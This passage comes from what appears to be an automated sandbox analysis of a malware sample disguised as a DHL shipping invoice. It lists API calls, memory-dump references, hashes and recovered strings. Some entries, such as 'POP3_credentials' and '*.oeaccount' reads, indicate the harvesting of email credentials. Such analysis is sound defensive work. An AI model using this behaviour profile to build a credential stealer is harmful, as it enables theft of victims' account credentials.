                                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                                                                      • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                                                                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1999381814-0
                                                                                                                                                                                                                                      • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                                                      • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                                                                                                                                      • API String ID: 1297977491-3883738016
                                                                                                                                                                                                                                      • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                                                      • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                                                                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                                                                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                                                                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                                                                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                                                                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                                      • API String ID: 438689982-4203073231
                                                                                                                                                                                                                                      • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                                                      • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004058C3
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                                                                                                                                                      • SetFocus.USER32(?), ref: 00405976
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4281309102-0
                                                                                                                                                                                                                                      • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                                                                      • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`|u,00000000,?,?,0040A7BE,00000001,0044CBC0,757C0A60), ref: 00406D4D
                                                                                                                                                                                                                                      • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040A921
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                                                                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                                                                                                      • API String ID: 1631269929-4153097237
                                                                                                                                                                                                                                      • Opcode ID: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                                                                                                                                      • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bcdc90beea248a1f5fcb7e61ec68337fdc50f98531e0a76bef795410e8d5f8aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040810E
                                                                                                                                                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                                                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                                                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,7739E430,?), ref: 004081B9
                                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                                                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                                                                                                                                      • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                                                                                                                                      • API String ID: 524865279-2190619648
                                                                                                                                                                                                                                      • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                                                                                                      • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                                                                                                                                      • String ID: 0$6
                                                                                                                                                                                                                                      • API String ID: 2300387033-3849865405
                                                                                                                                                                                                                                      • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                                                                                                      • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004076D7
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00407704
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407710
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00407733
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpystrlen$memsetsprintf
                                                                                                                                                                                                                                      • String ID: %s (%s)
                                                                                                                                                                                                                                      • API String ID: 3756086014-1363028141
                                                                                                                                                                                                                                      • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                                                                                                      • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                                                      • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                                                      • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                                                                                                                                      • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                                                                                                                                      • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                                                                                                                                      • API String ID: 1640410171-3316789007
                                                                                                                                                                                                                                      • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                                                                                                                                      • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscat$memsetsprintf
                                                                                                                                                                                                                                      • String ID: %2.2X
                                                                                                                                                                                                                                      • API String ID: 125969286-791839006
                                                                                                                                                                                                                                      • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                                                                                                                                      • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                                                                                                                                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                                                                                                                                        • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                                                                                                                                        • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                                                                                                                                        • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                                                                                                                                        • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                                                                                                                                        • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                                                                                                                                        • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                                                                                                                                      • String ID: ACD
                                                                                                                                                                                                                                      • API String ID: 1886237854-620537770
                                                                                                                                                                                                                                      • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                                                                                                                                      • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004091EC
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00409201
                                                                                                                                                                                                                                        • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                                                                                                                                        • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                                                                        • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                                                                                                                                      • String ID: caption$dialog_%d
                                                                                                                                                                                                                                      • API String ID: 2923679083-4161923789
                                                                                                                                                                                                                                      • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                                                                                                                                      • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                                                                                                                                      • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                                                                                                                                      • no such savepoint: %s, xrefs: 00426A02
                                                                                                                                                                                                                                      • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                                                                                                                                      • unknown error, xrefs: 004277B2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                                                                                                                                      • API String ID: 3510742995-3035234601
                                                                                                                                                                                                                                      • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                                                                      • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000006.00000002.423681742755.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000006.00000002.423681742755.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_400000_DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.jbxd
